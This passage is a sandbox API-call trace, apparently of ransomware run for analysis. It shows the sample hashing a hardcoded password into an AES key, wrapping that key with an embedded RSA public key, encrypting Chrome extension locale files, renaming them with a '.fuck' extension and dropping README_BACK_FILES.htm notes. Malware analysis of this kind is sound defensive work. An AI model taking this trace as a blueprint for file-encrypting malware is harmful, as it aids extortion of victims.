hFile=0x5d5c, lpBuffer=0x2e15c98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e15c98*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0257.356] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x165, lpOverlapped=0x0) returned 1 [0257.358] CryptEncrypt (in: hKey=0x2e194a8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x165, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x170) returned 1 [0257.358] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x170, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x170, lpOverlapped=0x0) returned 1 [0257.358] CloseHandle (hObject=0x5d60) returned 1 [0257.358] CloseHandle (hObject=0x5d5c) returned 1 [0257.358] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ka\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ka\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ka\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ka\\messages.json"), bFailIfExists=0) returned 1 [0257.362] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ka\\messages.json", dwFileAttributes=0x0) returned 1 [0257.363] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ka\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ka\\messages.json.gsg")) returned 1 [0257.364] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ka\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ka\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ka\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ka\\messages.json.fuck")) returned 1 [0257.366] CryptDestroyHash (hHash=0x2e18128) returned 1 [0257.366] CryptDestroyKey (hKey=0x2e194a8) returned 1 [0257.366] CryptReleaseContext (hProv=0x2e13988, dwFlags=0x0) returned 1 [0257.366] FindNextFileA (in: hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0257.366] FindClose (in: hFindFile=0x2e180e8 | out: hFindFile=0x2e180e8) returned 1 [0257.366] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ka\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ka\\readme_back_files.htm")) returned 0xffffffff [0257.366] AreFileApisANSI () returned 1 [0257.366] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4420, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0257.366] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ka\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ka\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0257.367] GetFileType (hFile=0x5d50) returned 0x1 [0257.367] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0257.368] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0257.369] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\km\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e180e8 [0257.369] FindNextFileA (in: hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0257.369] FindNextFileA (in: hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0257.370] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0257.370] GetLastError () returned 0x0 [0257.370] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\km\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\km\\messages.json")) returned 0x20 [0257.370] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\km\\messages.json", dwFileAttributes=0x80) returned 1 [0257.370] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\km\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\km\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0257.371] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\km\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\km\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0257.372] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\km\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0257.373] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e13988) returned 1 [0257.375] CryptCreateHash (in: hProv=0x2e13988, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0257.375] lstrlenA (lpString="byYgIfljhIqZCcAZfOYyRTjjzMlQm") returned 29 [0257.375] CryptHashData (hHash=0x2e18128, pbData=0x28cb6c0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0257.375] CryptDeriveKey (in: hProv=0x2e13988, Algid=0x6610, hBaseData=0x2e18128, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e194a8) returned 1 [0257.375] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0257.375] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0257.375] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e16628) returned 1 [0257.376] CryptImportPublicKeyInfo (in: hCryptProv=0x2e16628, dwCertEncodingType=0x1, pInfo=0x2e24dc0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e24df0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e24df8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e19d28) returned 1 [0257.376] CryptEncrypt (in: hKey=0x2e19d28, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0257.376] CryptEncrypt (in: hKey=0x2e19d28, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e16160*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e16160*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0257.376] WriteFile (in: hFile=0x5d60, lpBuffer=0x2e16160*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e16160*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0257.377] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x25f, lpOverlapped=0x0) returned 1 [0257.391] CryptEncrypt (in: hKey=0x2e194a8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x25f, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x260) returned 1 [0257.391] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x260, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x260, lpOverlapped=0x0) returned 1 [0257.419] CloseHandle (hObject=0x5d5c) returned 1 [0257.419] CloseHandle (hObject=0x5d60) returned 1 [0257.419] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\km\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\km\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\km\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\km\\messages.json"), bFailIfExists=0) returned 1 [0257.422] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\km\\messages.json", dwFileAttributes=0x0) returned 1 [0257.423] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\km\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\km\\messages.json.gsg")) returned 1 [0257.424] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\km\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\km\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\km\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\km\\messages.json.fuck")) returned 1 [0257.425] CryptDestroyHash (hHash=0x2e18128) returned 1 [0257.426] CryptDestroyKey (hKey=0x2e194a8) returned 1 [0257.426] CryptReleaseContext (hProv=0x2e13988, dwFlags=0x0) returned 1 [0257.426] FindNextFileA (in: hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0257.426] FindClose (in: hFindFile=0x2e180e8 | out: hFindFile=0x2e180e8) returned 1 [0257.426] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\km\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\km\\readme_back_files.htm")) returned 0xffffffff [0257.426] AreFileApisANSI () returned 1 [0257.426] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3ee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0257.426] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\km\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\km\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0257.427] GetFileType (hFile=0x5d50) returned 0x1 [0257.427] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0257.428] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0257.428] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\kn\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e180e8 [0257.428] FindNextFileA (in: hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0257.428] FindNextFileA (in: hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0257.429] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0257.429] GetLastError () returned 0x0 [0257.429] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\kn\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\kn\\messages.json")) returned 0x20 [0257.429] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\kn\\messages.json", dwFileAttributes=0x80) returned 1 [0257.429] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\kn\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\kn\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0257.430] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\kn\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\kn\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0257.432] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\kn\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0257.432] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e13988) returned 1 [0257.435] CryptCreateHash (in: hProv=0x2e13988, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0257.435] lstrlenA (lpString="byYgIfljhIqZCcAZfOYyRTjjzMlQm") returned 29 [0257.435] CryptHashData (hHash=0x2e18128, pbData=0x28cb5a8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0257.435] CryptDeriveKey (in: hProv=0x2e13988, Algid=0x6610, hBaseData=0x2e18128, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e19828) returned 1 [0257.435] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0257.435] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0257.435] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e16490) returned 1 [0257.436] CryptImportPublicKeyInfo (in: hCryptProv=0x2e16490, dwCertEncodingType=0x1, pInfo=0x2e24400*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e24430*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e24438*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e19c28) returned 1 [0257.436] CryptEncrypt (in: hKey=0x2e19c28, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0257.436] CryptEncrypt (in: hKey=0x2e19c28, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e16518*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e16518*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0257.436] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2e16518*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e16518*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0257.437] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x147, lpOverlapped=0x0) returned 1 [0257.438] CryptEncrypt (in: hKey=0x2e19828, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x147, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x150) returned 1 [0257.438] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x150, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x150, lpOverlapped=0x0) returned 1 [0257.439] CloseHandle (hObject=0x5d60) returned 1 [0257.439] CloseHandle (hObject=0x5d5c) returned 1 [0257.439] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\kn\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\kn\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\kn\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\kn\\messages.json"), bFailIfExists=0) returned 1 [0257.442] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\kn\\messages.json", dwFileAttributes=0x0) returned 1 [0257.443] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\kn\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\kn\\messages.json.gsg")) returned 1 [0257.444] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\kn\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\kn\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\kn\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\kn\\messages.json.fuck")) returned 1 [0257.445] CryptDestroyHash (hHash=0x2e18128) returned 1 [0257.446] CryptDestroyKey (hKey=0x2e19828) returned 1 [0257.446] CryptReleaseContext (hProv=0x2e13988, dwFlags=0x0) returned 1 [0257.446] FindNextFileA (in: 